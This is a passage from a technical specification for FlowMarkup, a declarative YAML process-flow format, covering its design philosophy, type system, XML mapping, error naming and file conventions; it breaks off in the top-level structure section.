# FlowMarkup: Process Flow Definition Format

**Version:** 0.9.0
**Date:** 2026-03-28
**Designed by:** Łukasz Nawojczyk
**Copyright:** © 2026 Progralink Łukasz Nawojczyk. All rights reserved.
**License:** Open Web Foundation Agreement 1.0 (OWFa 1.0)

### Conformance

The key words "MUST", "MUST NOT", "SHOULD", "SHOULD NOT", and "MAY" in this specification are to be interpreted as described in [RFC 2119](https://www.rfc-editor.org/rfc/rfc2119).

## Design Philosophy

### Processes Are Contracts, Not Programs

A payment pipeline promises that funds transfer correctly. A claims workflow promises consistent evaluation against the same rules. A compliance process promises regulators that controls execute in order, every time, without exception.

These promises are contracts — with customers, with regulators, with the business itself. FlowMarkup treats process definitions as formal contracts: declarative specifications that state precisely what will happen, under what conditions, with what guarantees. Not programs that happen to produce the right behavior most of the time — contracts that can be read, validated, tested, and audited before a single step executes.

This distinction drives every design decision in the format.

### Core Principles

**1. Declared, not generated.** The flow definition IS the specification. Every step, every branch, every error handler, every timeout is stated explicitly in YAML. There is no hidden logic, no implicit behavior, no runtime decision-making about what to do next. What you read is what executes.

This means the flow definition serves simultaneously as documentation, as specification, as the auditable record, and as the executable artifact. There is no drift between what was specified and what runs, because they are the same thing. When behavior changes, there is a diff to review. Rollback means deploying the previous version.

**2. Constrained by design.** FlowMarkup deliberately limits what you can express. There is a small, fixed set of directives and a small, fixed set of default actions (call, run, request, exec, mail, storage, ssh), not an extensible set. CEL expressions are non-Turing-complete: no unbounded loops, no I/O, no side effects. Actions are typed contracts with declared inputs, outputs, and errors, not arbitrary function calls.

These constraints are features, not limitations. A non-Turing-complete expression language can be statically analyzed for termination, type correctness, and security properties. A finite directive set can be exhaustively validated by schema and static analysis. A typed action contract can be verified at authoring time, tested with mocks at the service boundary, and monitored at runtime. Every constraint in FlowMarkup exists because it enables a guarantee that unconstrained systems cannot provide.

**3. Orchestration separated from execution.** FlowMarkup separates WHAT the process does (the flow definition) from HOW each step executes (action providers and services). The flow controls sequencing, branching, error handling, retry, timeout, and data flow. Action providers handle I/O — database queries, API calls, file operations, AI inference.

This separation is why flows can be validated without running external services, tested with mocked services in milliseconds, deployed across environments by changing service configuration, and composed into larger processes through sub-flow invocation — all without modifying the flow itself.

**4. Contracts over conventions.** Every flow declares its interface: what it requires (`input:`), what it produces (`output:`), what can go wrong (`throws:`), what it yields mid-execution (`yields:`). Every action declares the same. Kinds are explicit (`$kind:`). Content types are explicit (`$type:`). Defaults are explicit (`$default:`). Nullability is explicit (`$nullable:`).

There is no implicit contract, no reliance on documentation that drifts, no assumption that the caller "just knows" the data format. The schema validates contracts structurally. Static analysis verifies they are honored semantically. Tests exercise them against scenarios.

**5. Secure by default, not by effort.** Security in FlowMarkup is structural, not a checklist of best practices bolted onto a permissive system:

- CEL cannot perform I/O or modify host state — eliminating entire vulnerability classes by construction.
- Expression results are never re-evaluated as expressions — eliminating injection-via-output.
- Secrets are opaque values (`SECRET.*`) with mandatory redaction, no auto-coercion, no template interpolation — enforced by dedicated SA-SECRET rules.
- Capabilities decrease monotonically down the call chain — sub-flows never gain privileges their parent does not hold.
- `exec` and `mail` are deny-by-default with explicit allowlists.
- Static analysis rules — including SA-SECRET, SA-CEL, SA-RUN, and SA-EXEC categories — catch security violations at authoring time.

The flow author does not need to remember to sanitize inputs or redact secrets. The format and toolchain enforce it.

**6. Readable by all stakeholders.** A business process has multiple stakeholders: the engineer who builds it, the analyst who designs it, the compliance officer who approves it, the on-call engineer who debugs it at 3am. All of them need to understand what the process does.

FlowMarkup is YAML — readable by non-engineers with minimal orientation. The flow definition shows business logic without infrastructure noise. A `forEach` loop is a `forEach` loop, not a thread pool with a callback. An error handler is a `catch:` block, not a try-catch-finally chain wrapped in a retry decorator inside an async context manager. A timeout is `timeout: 30s`, not a configuration object passed to a client builder.

This is a deliberate trade-off: FlowMarkup sacrifices the expressiveness of general-purpose languages for readability across stakeholder boundaries.

**7. Auditable by construction.** Every execution follows the declared flow. The execution trace maps 1:1 to the flow definition — each step emits an OpenTelemetry span with type, label, and error information. When something goes wrong, the trace points to a specific step in a specific flow definition that anyone can read.

Compliance teams review the YAML and know exactly what will happen before it happens. Auditors trace an execution and map every decision to a declared branch in the flow. There is no gap between "what the specification says" and "what the system did."

### Why Not General-Purpose Code?

General-purpose languages offer full control and Turing-complete expressiveness. FlowMarkup deliberately gives up both.

Process orchestration does not need Turing completeness — it needs sequencing, branching, looping, error handling, and typed data flow. Providing more power than necessary has costs: business logic drowns in infrastructure boilerplate (HTTP clients, connection pools, serialization, retry loops). Contracts live in documentation that drifts from code. Validation requires hand-written tests for every path. Non-engineers cannot read, review, or audit the logic.

Workflow frameworks (Temporal, Airflow, Step Functions) address some of these problems but remain imperative programs in a host language — carrying that language's complexity, opacity, and attack surface. The process definition is scattered across code, configuration, and framework conventions rather than contained in a single, readable, validatable artifact.

### Why Not AI-Driven Orchestration?

Agentic AI workflows — where a large language model decides which tools to call, in what order, with what arguments — invert every principle above:

- **Non-deterministic.** The same prompt can produce a different execution path on each run. There is no stable definition to version, diff, review, or roll back. Model updates and sampling variance silently change behavior.
- **Opaque.** Logic is a natural-language prompt that cannot be statically analyzed, formally verified, or structurally validated. Understanding what the system does requires running it — repeatedly, because each run may differ.
- **Unvalidatable.** No schema, no type system, no compile step. Correctness can only be assessed empirically, and empirical assessment of a non-deterministic system is fundamentally incomplete.
- **Untestable.** Testing requires full model inference — slow, expensive, non-reproducible. There is no meaningful notion of coverage when execution paths are determined at runtime by a stochastic model.
- **Insecure.** Every LLM call is a prompt injection surface. The model can hallucinate parameters, fabricate endpoints, or exfiltrate data through tool arguments. The "code" is regenerated on every execution, making security review a per-invocation problem.
- **Unauditable.** Non-determinism makes audit trails unreliable. Explaining why a decision was made requires inspecting model internals, which even the model's creators cannot fully account for.
- **Expensive.** Every orchestration decision incurs LLM inference cost and latency: seconds of delay and per-token billing at each step, scaling linearly with complexity.

These are not engineering shortcomings to be fixed with better prompts or more guardrails. They are inherent properties of a stochastic model. Non-determinism is what makes LLMs powerful — it enables creativity, generalization, and flexible reasoning. But orchestration demands the opposite: determinism, predictability, and formal verifiability. Using a stochastic model as an orchestrator means fighting its core strength.

### Where AI Belongs

FlowMarkup does not reject AI. It separates what AI is good at from what orchestration requires.

AI excels at specific tasks: classification, generation, analysis, translation, summarization, anomaly detection, decision support. These are capabilities — powerful ones. But performing tasks well is fundamentally different from deciding which tasks to perform, in what order, with what error handling and recovery strategy. The first is a capability problem. The second is a control problem. FlowMarkup handles control. AI handles capability.

In FlowMarkup, AI is a **callable service** behind a typed action contract:

```yaml
- call:
    service: claude
    operation: classify
    params:
      text: =customer_message
      categories: ["billing", "technical", "general"]
    result:
      category: classification
    timeout: 10s
    retry:
      maxAttempts: 3
      onErrors: [TimeoutError, ServiceUnavailableError]
```

The flow author controls **when** AI is invoked, **with what inputs**, **under what constraints** (timeout, retry, circuit breaker, rate limit), and **how to handle its outputs** — including validation, error paths, and fallback logic. The AI performs the task. The flow controls the process. Each operates in the domain where it is strong.

### AI-Assisted Authoring

AI can also help **write** FlowMarkup flows. This is fundamentally different from AI **being** the workflow — and it is where the format's constraints become a decisive advantage.

AI-generated code in general-purpose languages must be manually reviewed for correctness, security vulnerabilities, hallucinated API calls, and subtle logic errors. This review requires deep expertise, is error-prone, and does not scale. The reviewer must catch problems that look plausible but are wrong — the hardest kind of bug to find.

AI-generated FlowMarkup passes through the same three-layer validation as human-authored flows. JSON Schema catches structural errors. Static analysis rules catch semantic errors — undefined variables, unreachable code, secret misuse, type mismatches, invalid expressions. The testing framework verifies behavior. The validation does not care whether a human or an AI wrote the flow — it enforces the same rules, with the same rigor, every time.

The format's constraints work in AI's favor: a finite vocabulary (a fixed set of directives, typed actions, CEL expressions), a strict schema, and unambiguous semantics reduce the space of possible outputs, making generation more reliable than producing arbitrary code. And when the AI makes a mistake, the toolchain catches it at authoring time — not in production.

---

## 1. Core Concepts

### 1.1 Terminology

| Term | Definition | Examples |
|---|---|---|
| **Step** | Any item in a `do:` list | All of the below |
| **Directive** | Built-in control flow step. Fixed schema, engine-native. | `group`, `if`, `forEach`, `while`, `repeat`, `try`, `set`, `log`, `logWarn`, `logError`, `switch`, `assert`, `throw`, `return`, `yield`, `wait`, `waitUntil`, `break`, `continue`, `emit`, `waitFor`, `lock`, `cancel`, `parallel`, `race` |
| **Action** | Step performing I/O. Declares `output`/`errors` contract. Loaded by the engine's action providers. | `call`, `exec`, `request`, `run`, `mail`, `storage`, `ssh`, any custom |
| **Service** | A named target invoked by the `call` action via `service:` | `SERVICES.claude` |

Steps are either **directives** or **actions**. Directives control execution flow. Actions perform I/O operations.

### 1.2 Typed Contracts

Every flow and every action declares:
- **input** -- what it requires
- **output** -- what it produces
- **errors** -- what can go wrong (declared with `throws:` at the flow level)

`output:` (flow level) declares the flow's output contract. `result:` (step level) maps an action's return values into flow variables.

### 1.3 Unified Type System

The type system uses four fields:

- **`$kind`** — structural data kind (UPPERCASE constant or CEL expression)
- **`$type`** — MIME content type (e.g., `application/json`, `image/png`)
- **`$format`** — regex validation pattern for string values. All regex evaluation in FlowMarkup (`$format` validation, `s.matches(regex)`, static analysis pattern matching) MUST use a linear-time regex engine (RE2 or equivalent). PCRE features (backreferences, lookaheads, lookbehinds) are NOT supported. Patterns using unsupported features MUST raise `ValidationError` at load time.
- **`$charset`** — IANA character encoding name for external text content (e.g., `shift_jis`, `windows-1252`)

`$kind` describes the structural category of the data:

| `$kind` | Default `$type` | Category |
|---|---|---|
| `STRING` | `text/plain` (single-line) | primitive |
| `TEXT` | `text/plain` | text |
| `MARKDOWN` | `text/markdown` | text |
| `BINARY` | `application/octet-stream` | binary |
| `NUMBER` | exact decimal | primitive |
| `INTEGER` | exact integer | primitive |
| `BOOLEAN` | boolean | primitive |
| `ARRAY` | `application/json` | collection |
| `MAP` | `application/json` | structured |
| `DIRECTORY` | (filesystem) | resource |
| `ANY` | `application/octet-stream` | untyped |

`DIRECTORY` represents a filesystem directory listing from RESOURCES. Entries are maps with `name` (STRING), `size` (INTEGER), and `type` (STRING: `file` or `directory`) keys.

**Compound shorthands:** `JSON`, `YAML`, `XML`, `CSV`, and `TSV` are shorthands that expand to `$kind` + `$type`:
- `JSON` expands to `$kind: MAP, $type: application/json`
- `YAML` expands to `$kind: MAP, $type: application/yaml`
- `XML` expands to `$kind: MAP, $type: application/xml`
- `CSV` expands to `$kind: ARRAY, $type: text/csv`
- `TSV` expands to `$kind: ARRAY, $type: text/tab-separated-values`

These shorthands are accepted anywhere `$kind` is accepted (paramDef, typedVar, etc.) and are expanded by the engine at load time.
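As an illustration only, the expansion can be sketched in Python as a lookup table. The function name `expand_shorthand` and the dict-based representation of a declaration are assumptions made for this sketch, not part of FlowMarkup. The sketch also assumes that an explicitly written `$type` is kept when a shorthand is expanded.

```python
# Compound shorthands and their expansions, copied from the list above.
SHORTHANDS = {
    "JSON": ("MAP", "application/json"),
    "YAML": ("MAP", "application/yaml"),
    "XML": ("MAP", "application/xml"),
    "CSV": ("ARRAY", "text/csv"),
    "TSV": ("ARRAY", "text/tab-separated-values"),
}


def expand_shorthand(decl: dict) -> dict:
    """Return a copy of a declaration with any compound shorthand expanded.

    `decl` is a hypothetical parsed declaration such as {"$kind": "CSV"}.
    """
    out = dict(decl)
    kind = out.get("$kind")
    if kind in SHORTHANDS:
        base_kind, mime = SHORTHANDS[kind]
        out["$kind"] = base_kind
        # Assumption: an explicit $type written by the author is preserved.
        out.setdefault("$type", mime)
    return out


print(expand_shorthand({"$kind": "CSV"}))
print(expand_shorthand({"$kind": "STRING"}))  # not a shorthand, unchanged
```

Declarations that already use a plain `$kind` pass through unchanged, so the function can be applied uniformly at load time.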

**`$kind` inference (paramDef only):** In input/output parameter declarations, `$kind` may be omitted when unambiguously inferable. The engine resolves `$kind` using these rules (in precedence order):

1. **Explicit `$kind`** always wins — no inference needed.
2. **`$schema` → `$kind`** — the engine resolves the schema's root `type` field: `object` → MAP, `array` → ARRAY, `string` → STRING, `number` → NUMBER, `integer` → INTEGER, `boolean` → BOOLEAN. When the schema is unresolvable (external `$ref` not yet fetched, resolution disabled), the engine defaults to MAP. The inferred `$kind` may be lazily updated once the schema is resolved. **Recommendation:** when a schema defines an array root type, authors should use explicit `$kind: ARRAY` for clarity.
3. **`$enum` → `$kind: STRING`** — since `$enum` items are always strings per the schema.
4. **`$default` (literal) → `$kind`** — inferred from the YAML scalar type of the default value: string → STRING, integer → INTEGER, float → NUMBER, boolean → BOOLEAN, sequence → ARRAY, mapping → MAP. `null` and CEL expressions (`=...`) cannot infer `$kind` — explicit `$kind` is required.

If both `$schema` and `$default` are present, `$schema` takes precedence for inference. The engine SHOULD warn (SA-KIND-4) if the inferred `$kind` from `$default` conflicts with the inferred `$kind` from `$schema`.

**Scope:** `$kind` inference applies to `paramDef` only (input/output parameter declarations). `typedVar` (vars/const) keeps `$kind` required: variables always carry a `$value`, which is frequently a CEL expression and therefore too ambiguous to infer from.
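The precedence rules above can be sketched in Python as follows. This is a minimal illustration, not the engine's implementation: `infer_kind`, `KindInferenceError`, and the representation of a paramDef as an already-parsed dict are all assumptions. A schema without a root `type` (for example an unresolved `$ref`) falls back to MAP, as described in rule 2.

```python
class KindInferenceError(ValueError):
    """Hypothetical error: $kind is neither explicit nor inferable."""


SCHEMA_TYPE_TO_KIND = {
    "object": "MAP", "array": "ARRAY", "string": "STRING",
    "number": "NUMBER", "integer": "INTEGER", "boolean": "BOOLEAN",
}


def kind_from_default(value):
    """Rule 4: infer from a literal default; None means 'cannot infer'."""
    if value is None:
        return None
    if isinstance(value, bool):  # checked before int: bool is an int subclass
        return "BOOLEAN"
    if isinstance(value, int):
        return "INTEGER"
    if isinstance(value, float):
        return "NUMBER"
    if isinstance(value, str):
        return None if value.startswith("=") else "STRING"  # =... is CEL
    if isinstance(value, list):
        return "ARRAY"
    if isinstance(value, dict):
        return "MAP"
    return None


def infer_kind(param: dict):
    """Return (kind, warnings) for a paramDef given as a parsed dict."""
    warnings = []
    if "$kind" in param:  # rule 1: explicit always wins
        return param["$kind"], warnings
    from_default = kind_from_default(param["$default"]) if "$default" in param else None
    if "$schema" in param:  # rule 2: schema root type, MAP when unresolved
        schema = param["$schema"]
        root = schema.get("type") if isinstance(schema, dict) else None
        kind = SCHEMA_TYPE_TO_KIND.get(root, "MAP")
        if from_default is not None and from_default != kind:
            warnings.append("SA-KIND-4: $default conflicts with $schema")
        return kind, warnings
    if "$enum" in param:  # rule 3
        return "STRING", warnings
    if from_default is not None:  # rule 4
        return from_default, warnings
    raise KindInferenceError("explicit $kind is required")


print(infer_kind({"$default": "standard"}))
print(infer_kind({"$schema": {"type": "array"}, "$default": "x"}))
```

Checking `bool` before `int` matters in Python because `True` is also an instance of `int`; other host languages may not need that ordering.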

CSV and TSV content is parsed into a list of MAP objects where each map represents a row keyed by column headers from the first line. The header row is mandatory; content without a header row raises `ParseError`. Parsing is lazy — the engine defers parsing until the first CEL access to the value's content. CSV follows RFC 4180 (comma delimiter, quoted fields supporting embedded commas and newlines). TSV uses tab as the delimiter.
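A rough Python sketch of this behavior, using the standard `csv` module, is shown below. The names `parse_delimited`, `LazyTable`, and the local `ParseError` class are hypothetical. The sketch treats empty content as "no header row", which is the only case a generic parser can detect, and it leaves every cell as a string because that is what Python's `csv` module does.

```python
import csv
import io


class ParseError(ValueError):
    """Stand-in for the spec's ParseError."""


def parse_delimited(content: str, delimiter: str = ","):
    """Parse CSV/TSV text into a list of row maps keyed by the header row."""
    reader = csv.DictReader(io.StringIO(content, newline=""), delimiter=delimiter)
    if reader.fieldnames is None:  # nothing to read, so no header row
        raise ParseError("header row is mandatory")
    return [dict(row) for row in reader]


class LazyTable:
    """Defers parsing until the rows are first accessed."""

    def __init__(self, content: str, delimiter: str = ","):
        self._content = content
        self._delimiter = delimiter
        self._rows = None  # not parsed yet

    @property
    def rows(self):
        if self._rows is None:
            self._rows = parse_delimited(self._content, self._delimiter)
        return self._rows


table = LazyTable('name,note\nAlice,"hello, world"\n')  # no parsing happens here
print(table.rows)  # first access triggers the parse
```

Because parsing is deferred, malformed content only raises when the value is first read, which is worth keeping in mind when deciding where to place error handling.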

#### XML-to-MAP Mapping Convention

XML content is parsed into a MAP using a deterministic mapping convention. This convention applies universally to all XML auto-decode contexts: `decode(XML)`, `parse(XML)`, `parseAs: XML` (exec/ssh/request/storage auto-parse), and RESOURCES `.xml` file loading. The same convention governs `encode(XML)` in reverse.

**Mapping rules:**

- Root element becomes the single top-level MAP key (enables roundtrip: `decode(XML).encode(XML)`)
- Child elements become MAP keys with their parsed content as values
- Text-only elements (no attributes, no children) become bare string values: `<name>Alice</name>` → `"Alice"`
- Elements with attributes AND text use `@` prefix for attributes and `$text` for text content: `<item sku="A1">Widget</item>` → `{"@sku": "A1", "$text": "Widget"}`
- Multiple same-name siblings become an ARRAY
- Empty elements become empty string `""` (no attributes) or MAP with only `@` keys (has attributes)
- **All element text values are STRING** — no number/boolean coercion (consistent with XML's type-agnostic nature; use `int()`, `double()`, `bool()` in CEL for type conversion)
- CDATA treated as text (merged into `$text`)
- Comments and processing instructions discarded
- Namespaces: preserve prefixes as-is (`ns:element` stays `ns:element`)
- XML declaration discarded on parse, regenerated on encode

**Example:**

```xml
<order id="123" status="pending">
  <customer>
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <items>
    <item sku="A1">Widget</item>
    <item sku="A2">Gadget</item>
  </items>
</order>
```

Parses to:

```yaml
order:
  "@id": "123"
  "@status": "pending"
  customer:
    name: Alice
    email: alice@example.com
  items:
    item:
    - "@sku": A1
      "$text": Widget
    - "@sku": A2
      "$text": Gadget
```

**Limitation — mixed content:** Mixed content (`<p>Hello <b>world</b></p>`) captures direct text in `$text` and child elements as separate keys but loses text-vs-element ordering. Use XPath for complex mixed-content queries.

**Limitation — single vs array ambiguity:** A single `<item>` produces a MAP value, not a one-element ARRAY. Shape depends on data. To guarantee consistent array behavior regardless of cardinality, use `xpathAll()` which always returns a list. Static analysis rule SA-XML-4 (WARN) MUST flag direct map access on XML-decoded values whose cardinality is data-dependent. The `decode(XML)` function MUST support a `forceArray` option: `decode(XML, {forceArray: ['item']})` — listed element names always produce arrays, even for single elements.

**Guidance:** When processing XML with potentially variable-cardinality elements, validate the result structure with `type(value)` before access, or use `$schema` validation on the parsed output.
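The mapping rules can be approximated in Python with the standard `xml.etree.ElementTree` module. This is a sketch under stated assumptions: `xml_to_map` and its `force_array` parameter are hypothetical names (the latter mirrors the `forceArray` option), surrounding whitespace is trimmed from text, and namespace prefixes are out of scope because ElementTree rewrites them to `{uri}local` form.

```python
import xml.etree.ElementTree as ET


def _element_value(elem, force_array):
    attrs = {"@" + name: value for name, value in elem.attrib.items()}
    children = list(elem)
    # Direct text is the element's own text plus the tails of its children.
    text = ((elem.text or "") + "".join(c.tail or "" for c in children)).strip()
    if not attrs and not children:
        return text  # text-only element, or "" for an empty element
    result = dict(attrs)
    for child in children:
        value = _element_value(child, force_array)
        if child.tag in result:
            existing = result[child.tag]
            if isinstance(existing, list):
                existing.append(value)  # third and later siblings
            else:
                result[child.tag] = [existing, value]  # second sibling
        elif child.tag in force_array:
            result[child.tag] = [value]  # always an array, even for one item
        else:
            result[child.tag] = value
    if text:
        result["$text"] = text
    return result


def xml_to_map(xml_text: str, force_array=()):
    """Parse XML into a nested dict; the root tag is the single top-level key."""
    root = ET.fromstring(xml_text)  # comments and PIs are dropped by default
    return {root.tag: _element_value(root, frozenset(force_array))}


single = '<items><item sku="A1">Widget</item></items>'
print(xml_to_map(single))                         # item is a MAP
print(xml_to_map(single, force_array=["item"]))   # item is a one-element list
```

The two calls at the end show the cardinality ambiguity directly: the same document yields a MAP or a list for `item` depending on whether the element name is forced to an array.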

`$type` is an explicit MIME content type. When `$kind` is specified without `$type`, the engine derives the default `$type` from the table above. When `$type` is specified explicitly, it overrides the default. Full MIME types are accepted: `image/png`, `application/pdf`, etc. Any valid MIME type per RFC 6838 is accepted. The engine SHOULD NOT reject unknown MIME types — it stores them as-is and passes them to action providers for interpretation.

`$format` is a regex pattern for string validation. The engine validates on assignment and throws `ValidationError` if the value does not match. Example: `$format: "^[A-Z]{3}$"` for currency codes.

`STRING` is single-line (no `\n`, `\r`). The engine validates on assignment and throws `ValidationError` if line breaks are present.
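The two assignment-time checks for `STRING` values can be sketched in Python as below. `validate_string` and the local `ValidationError` class are hypothetical names. Note that Python's `re` module is a backtracking engine, not a linear-time one, so it stands in here purely for illustration; a conforming engine would need RE2 or an equivalent.

```python
import re


class ValidationError(ValueError):
    """Stand-in for the spec's ValidationError."""


def validate_string(value: str, fmt=None) -> str:
    """Check the single-line rule and an optional $format pattern."""
    if "\n" in value or "\r" in value:
        raise ValidationError("STRING values must not contain line breaks")
    # Assumption: the pattern is applied as a search, so authors anchor it
    # themselves with ^ and $ as in the currency-code example.
    if fmt is not None and re.search(fmt, value) is None:
        raise ValidationError(f"value does not match $format {fmt!r}")
    return value


print(validate_string("USD", "^[A-Z]{3}$"))
```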

The engine always resolves a kind to a valid MIME content type -- never null.

### 1.4 Schema: Directives vs Actions

The core JSON Schema defines **only directives**. All actions are matched by a generic **action step** pattern. Action providers contribute type-specific schemas composed by the engine.

### 1.5 Error Naming

Error type names MUST use the `*Error` suffix. Error types support single-inheritance via `$parent:` in `throws:` declarations. User-defined parent types MUST be declared in the same `throws:` list (SA-ERR-2). System error types (those listed in the retryable/non-retryable table in §4.1) are implicitly available as parents and do not need re-declaration. Cycles are forbidden (SA-ERR-1).

`catch` entries are polymorphic: catching a parent type catches all descendants. `throw` always names an exact type; the engine attaches the full ancestry chain at throw time.
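To make the polymorphic matching concrete, here is a small Python sketch. The error names `PaymentError` and `CardDeclinedError`, the `parents` map, and both function names are invented for illustration. Handlers are tried in declaration order and the first entry that appears in the thrown type's ancestry chain wins.

```python
def ancestry(error_type: str, parents: dict) -> list:
    """Return [exact type, parent, grandparent, ...] for a thrown error."""
    chain = [error_type]
    while chain[-1] in parents:
        nxt = parents[chain[-1]]
        if nxt in chain:  # defensive: cycles are forbidden by SA-ERR-1
            raise ValueError("cycle in error hierarchy")
        chain.append(nxt)
    return chain


def select_handler(thrown: str, catch_order: list, parents: dict):
    """Pick the first catch entry that matches the thrown type or an ancestor."""
    chain = ancestry(thrown, parents)
    for name in catch_order:
        if name in chain:
            return name
    return "default" if "default" in catch_order else None


# Hypothetical hierarchy: CardDeclinedError extends PaymentError.
parents = {"CardDeclinedError": "PaymentError"}

print(ancestry("CardDeclinedError", parents))
print(select_handler("CardDeclinedError", ["PaymentError", "CardDeclinedError"], parents))
```

In the second call the parent handler is listed first, so the more specific `CardDeclinedError` handler can never be reached.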

Three declaration forms:
- **String form** -- bare type name for errors with no `$parent` or `data`
- **Object form** -- `$kind:` key when `$parent`, `data`, or `_notes_` are needed
- **Nested form** -- parent→children map (key is parent type, value is array of child declarations); desugars to flat list with `$parent` references. See §2.3 Error Type Hierarchy.

### 1.6 Naming Conventions

| Context | Convention | Examples |
|---|---|---|
| Structural YAML keys | `camelCase` | `forEach`, `waitFor`, `failPolicy`, `onTimeout`, `parseAs` |
| Data element and event names | `snake_case` | `order_id`, `user_name`, `CONTEXT.correlation_id` |
| Enum values | `UPPERCASE` | `PARALLEL`, `RACE`, `GLOBAL`, `EXPONENTIAL`, `JSON`, `CSV` |

---

## 2. Format Specification

### 2.1 File Convention

- Extensions:
  - `.flowmarkup.yaml` (preferred) or `.flowmarkup.yml` -- pure YAML
  - `.flowmarkup.md` -- literate flow format (YAML frontmatter + Markdown body)
- Encoding: UTF-8
- YAML version: 1.2.2

**Flow document limits.** The engine MUST enforce the following configurable limits to prevent resource exhaustion during parsing and validation *(CWE-400)*:

- **Document size:** maximum 1 MB (configurable maximum: 10 MB). Enforced by SA-FLOW-8 (ERROR).
- **Step count:** maximum 10,000 steps per flow (configurable maximum: 100,000). Enforced by SA-FLOW-9 (ERROR).
- **Control flow nesting depth:** maximum 32 levels of nested directives (`if`/`forEach`/`group`/`try`/`while`/`repeat`/`switch`). Enforced by SA-FLOW-10 (ERROR).
- **Variable declarations:** maximum 1,000 combined `vars:` and `const:` entries per flow (configurable maximum: 10,000).

Exceeding any limit MUST raise `ConfigurationError` at load time.

> **Quoting note:** In YAML 1.2.2 (Core Schema), the following bare values are parsed as their native types, not strings. Flow authors MUST quote `match:` keys and other literal string values that collide with these reserved forms when string comparison is intended (SA-YAML-1):
>
> | Category | Auto-typed values |
> |---|---|
> | Boolean | `true`, `True`, `TRUE`, `false`, `False`, `FALSE` |
> | Null | `null`, `Null`, `NULL`, `~`, empty value |
> | Integer | `0`, `42`, `+N`, `-N`, `0xHEX`, `0oOCTAL` |
> | Float | `1.0`, `.5`, `1e10`, `.inf`, `.Inf`, `.INF`, `-.inf`, `.nan`, `.NaN`, `.NAN` |
>
> Examples: `"true"`, `"null"`, `"1"`, `".inf"`.
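As a rough aid for tooling authors, the Core Schema resolution behind the quoting note can be sketched in Python with the regular expressions given in the YAML 1.2.2 specification. The function names `resolved_type` and `needs_quoting` are hypothetical, and the sketch only classifies plain (unquoted) scalars; it is not a YAML parser.

```python
import re

# Tag-resolution patterns of the YAML 1.2.2 Core Schema, tried in order.
_CORE_SCHEMA = [
    ("null", re.compile(r"null|Null|NULL|~|")),
    ("bool", re.compile(r"true|True|TRUE|false|False|FALSE")),
    ("int", re.compile(r"[-+]?[0-9]+|0o[0-7]+|0x[0-9a-fA-F]+")),
    ("float", re.compile(
        r"[-+]?(\.[0-9]+|[0-9]+(\.[0-9]*)?)([eE][-+]?[0-9]+)?"
        r"|[-+]?\.(inf|Inf|INF)"
        r"|\.(nan|NaN|NAN)"
    )),
]


def resolved_type(scalar: str) -> str:
    """Return the type a plain scalar resolves to under the Core Schema."""
    for name, pattern in _CORE_SCHEMA:
        if pattern.fullmatch(scalar):
            return name
    return "str"


def needs_quoting(scalar: str) -> bool:
    """True when a literal must be quoted to be compared as a string."""
    return resolved_type(scalar) != "str"


for literal in ["true", "~", "0x1F", "1e10", ".inf", "on", "standard"]:
    print(literal, resolved_type(literal), needs_quoting(literal))
```

Note that `on` resolves to a string here because the sketch follows YAML 1.2.2; a YAML 1.1 parser would treat it as a boolean.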

> **YAML 1.1 parser caveat:** Many widely-used YAML parsers default to YAML 1.1 (e.g., PyYAML for Python, SnakeYAML 1.x for Java, `gopkg.in/yaml.v2` for Go). YAML 1.1 additionally treats `on`/`off`/`yes`/`no`/`y`/`n` (case-insensitive) as booleans and uses a different octal prefix (`0777` instead of `0o777`). FlowMarkup requires YAML 1.2.2. Engine and tooling implementors MUST use a YAML 1.2-compliant parser. Examples by language: ruamel.yaml (Python), snakeyaml-engine (Java/JVM), `gopkg.in/yaml.v3` (Go; hybrid 1.1/1.2 — see CROSSLANG.md CL-6 for required post-parse normalization), js-yaml (JavaScript/TypeScript), yaml-rust2 (Rust), YamlDotNet (C#/.NET).
>
> **Design note:** FlowMarkup forbids bare `on:` as a YAML key — YAML 1.1 parsers interpret it as boolean `true`. All `on*` prefixed keys use camelCase compounds (`onTimeout:`, `onYield:`, `onErrors:`).

#### 2.1.1 Literate Flow Format (`.flowmarkup.md`)

A literate flow embeds the flow definition in YAML frontmatter delimited by `---`, with a Markdown body providing documentation.

```yaml
---
flowmarkup:
  title: "Order Processor"
  version: 2
  input:
    order_id: TEXT
  requires: {}                  # REQUIRED -- {} declares no capabilities
  do:
    - assert: =order_id != null
authors: ["alice"]
---
# Order Processor
Documentation goes here.
```

**Frontmatter rules:**
- The file MUST begin with `---` on the first line
- The frontmatter MUST contain a `flowmarkup:` key
- Additional keys alongside `flowmarkup:` are allowed and ignored by the engine
- If `flowmarkup.documentation` is omitted, the Markdown body becomes `flowmarkup.documentation`
- If `flowmarkup.documentation` is set in frontmatter, the Markdown body is ignored
- Missing closing `---` is a parse error
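The frontmatter rules can be sketched in Python using only the standard library. This is a simplified illustration: `split_literate`, `resolve_documentation`, and `FrontmatterError` are hypothetical names, the `flowmarkup:` key is detected with a line-based check rather than a real YAML parse, and a `---` line inside a YAML block scalar would be misread as the closing delimiter.

```python
import re


class FrontmatterError(ValueError):
    """Hypothetical parse error for literate flow files."""


def split_literate(text: str):
    """Split a .flowmarkup.md document into (frontmatter_yaml, markdown_body)."""
    lines = text.splitlines()
    if not lines or lines[0].rstrip() != "---":
        raise FrontmatterError("file must begin with '---' on the first line")
    for i in range(1, len(lines)):
        if lines[i].rstrip() == "---":
            frontmatter = "\n".join(lines[1:i])
            body = "\n".join(lines[i + 1:])
            break
    else:
        raise FrontmatterError("missing closing '---'")
    # Simplification: look for an unindented 'flowmarkup:' key.
    if not re.search(r"^flowmarkup:", frontmatter, re.MULTILINE):
        raise FrontmatterError("frontmatter must contain a 'flowmarkup:' key")
    return frontmatter, body


def resolve_documentation(flow: dict, body: str) -> str:
    """Frontmatter documentation wins; otherwise the Markdown body is used."""
    return flow["documentation"] if "documentation" in flow else body


sample = '---\nflowmarkup:\n  title: "Order Processor"\n---\n# Order Processor\n'
print(split_literate(sample))
```

In a real loader the returned frontmatter string would then be handed to a YAML 1.2-compliant parser, and `resolve_documentation` would be applied to the parsed `flowmarkup:` mapping.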

### 2.2 Top-Level Structure

```yaml
flowmarkup:
  title: string                 # REQUIRED
  version: integer              # optional -- major version number (default: 1)
  description: string           # optional -- short one-line description
  documentation: string         # optional -- full Markdown (auto-loaded from .md body)
  timeout: duration|integer|CEL # optional -- fails entire flow if exceeded

  rateLimit:                   # optional
    invocations: integer|CEL
    per: duration|integer|CEL
    strategy: WAIT|REJECT       # default: WAIT
    scope: GLOBAL|CONTEXT|LOCAL # default: GLOBAL
    key: "<cel-expression>"     # optional -- per-key bucketing
    timeout: duration|integer|CEL

